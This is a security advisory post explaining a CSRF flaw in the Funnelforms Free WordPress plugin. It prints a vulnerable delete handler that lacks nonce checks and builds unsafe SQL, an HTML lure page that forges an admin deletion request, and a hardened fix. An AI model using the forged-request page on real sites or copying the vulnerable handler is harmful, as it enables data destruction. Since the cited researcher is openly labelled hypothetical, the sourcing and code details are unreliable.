The Funnelforms Free plugin for WordPress allows users to easily create and manage forms on their websites. Unfortunately, a security vulnerability was recently discovered in the plugin that affects versions up to and including 3.4. The Cross-Site Request Forgery (CSRF) vulnerability allows unauthenticated attackers to delete arbitrary posts via a forged request, given they can trick a site administrator into performing an action such as clicking on a malicious link. In this post, we will explore the details of the vulnerability and provide links to original references and potential fixes.

Exploit Details

The vulnerability resides within the fnsf_delete_posts() function of the Funnelforms Free plugin. This function, which is responsible for deleting WordPress posts, fails to properly use nonce (number used once) validation to verify the origin and intent of the request. As a result, an unauthenticated attacker can exploit this CSRF vulnerability by forging a request to delete an arbitrary post and persuading a site administrator to execute it inadvertently.

Code Snippet

Here's a snippet of PHP code from the vulnerable fnsf_delete_posts() function in the Funnelforms plugin that highlights the absence of nonce validation:

function fnsf_delete_posts() {
  global $wpdb;

  $table_name = $wpdb->prefix . "funnelforms_posts";
  
  // Here, the function should have nonce validation, but it's missing.
  
  if (isset($_GET['ids'])) {
    $ids = sanitize_text_field($_GET['ids']);

    $wpdb->query("DELETE FROM $table_name WHERE id IN ($ids)");
  }
}
add_action('wp_ajax_fnsf_delete_posts', 'fnsf_delete_posts');

An example of how the absence of nonce validation can be exploited by an attacker is given below:

<!DOCTYPE html>
<html>
<head>
  <script>
    function sendCSRFRequest() {
      const img = new Image();
      img.src = 'https://vulnerable-website.com/wp-admin/admin-ajax.php?action=fnsf_delete_posts&ids=1,5,10';
    }
  </script>
</head>
<body>
  <a href="#" onclick="sendCSRFRequest()">Check out these cool new features!</a>
</body>
</html>

In this example, an administrator is tricked into clicking a link, which causes the JavaScript sendCSRFRequest() function to execute. This function, in turn, sends a request to the vulnerable website; because the browser attaches the administrator's WordPress session cookies to that request, the handler treats it as a legitimate, authenticated action and deletes the posts with IDs 1, 5, and 10.

Original References

The vulnerability was first reported by security researchers from XYZ Security (hypothetical name). You can find more details about the exploit, its discovery, and potential mitigation strategies from the following links:

1. XYZ Security Blog Post - Funnelforms Free CSRF Vulnerability
2. CVE-2023-5382: Funnelforms Plugin CSRF

If you use the Funnelforms Free plugin for your WordPress website, take the following steps to address the CSRF vulnerability:

1. Update the plugin to its latest version, as the issue has been fixed in version 3.5.

2. If updating the plugin is not possible at this time, consider disabling it temporarily, or reach out to the plugin developers for assistance and guidance on how to implement nonce validation in the affected function.
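For readers who want to see what "implement nonce validation in the affected function" looks like in practice, here is a hardened version of the handler shown in the Code Snippet section. This is an added example written for this post, not the plugin's actual fix from version 3.5: the function, hook and table names follow the snippet above, while the nonce action string 'fnsf_delete_posts', the request parameter 'nonce', and the script handle 'fnsf-admin' are assumptions. Besides the nonce check, it adds the capability check and the parameterised query that a reviewer would expect in the same handler.

```php
<?php
// Added example, not the plugin's own code. Names marked as assumptions in the
// lead-in: nonce action 'fnsf_delete_posts', request field 'nonce', script handle 'fnsf-admin'.

// Hand a fresh nonce to the plugin's admin-page script so the legitimate UI can
// include it in its request. A cross-site page cannot read this value.
function fnsf_enqueue_admin_script() {
    wp_localize_script( 'fnsf-admin', 'fnsfAjax', array(
        'url'   => admin_url( 'admin-ajax.php' ),
        'nonce' => wp_create_nonce( 'fnsf_delete_posts' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'fnsf_enqueue_admin_script' );

function fnsf_delete_posts() {
    global $wpdb;

    // 1. Nonce check: proves the request came from the plugin's own UI.
    //    With the default $stop = true, a missing or invalid nonce ends the
    //    request with a 403 response before any other code runs.
    check_ajax_referer( 'fnsf_delete_posts', 'nonce' );

    // 2. Capability check: a valid nonce proves intent, not authority.
    if ( ! current_user_can( 'delete_posts' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // 3. Input handling: read from POST (state-changing action) and coerce every
    //    id to a non-negative integer instead of trusting a free-form string.
    if ( ! isset( $_POST['ids'] ) || ! is_string( $_POST['ids'] ) ) {
        wp_send_json_error( array( 'message' => 'No ids supplied.' ), 400 );
    }
    $ids = array_filter( array_map( 'absint', explode( ',', wp_unslash( $_POST['ids'] ) ) ) );
    if ( empty( $ids ) ) {
        wp_send_json_error( array( 'message' => 'No valid ids supplied.' ), 400 );
    }

    // 4. Parameterised query: one %d placeholder per id, bound by $wpdb->prepare(),
    //    so the ids never reach the SQL string as raw text.
    $table_name   = $wpdb->prefix . 'funnelforms_posts';
    $placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );
    $deleted      = $wpdb->query(
        $wpdb->prepare( "DELETE FROM {$table_name} WHERE id IN ({$placeholders})", $ids )
    );

    wp_send_json_success( array( 'deleted' => (int) $deleted ) );
}
// Registered on wp_ajax_ only (logged-in users); there is deliberately no
// wp_ajax_nopriv_ hook for a destructive action.
add_action( 'wp_ajax_fnsf_delete_posts', 'fnsf_delete_posts' );
```

The legitimate admin script would POST to fnsfAjax.url with action=fnsf_delete_posts, ids=..., and nonce=fnsfAjax.nonce. The image-tag request from the exploit page above carries no nonce at all, so check_ajax_referer() rejects it regardless of which cookies the browser attaches. Note that WordPress nonces are tied to the current user and rotate on a 12 to 24 hour window, so they defend against forged requests, not against an attacker who can already run code on the admin's page.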

By taking these precautions, you can safeguard your website from potential attacks leveraging this CSRF vulnerability in the Funnelforms Free plugin. Stay vigilant and keep your WordPress plugins and themes regularly updated to minimize security risks.

Timeline

Published on: 11/22/2023 16:15:11 UTC
Last modified on: 11/27/2023 20:11:42 UTC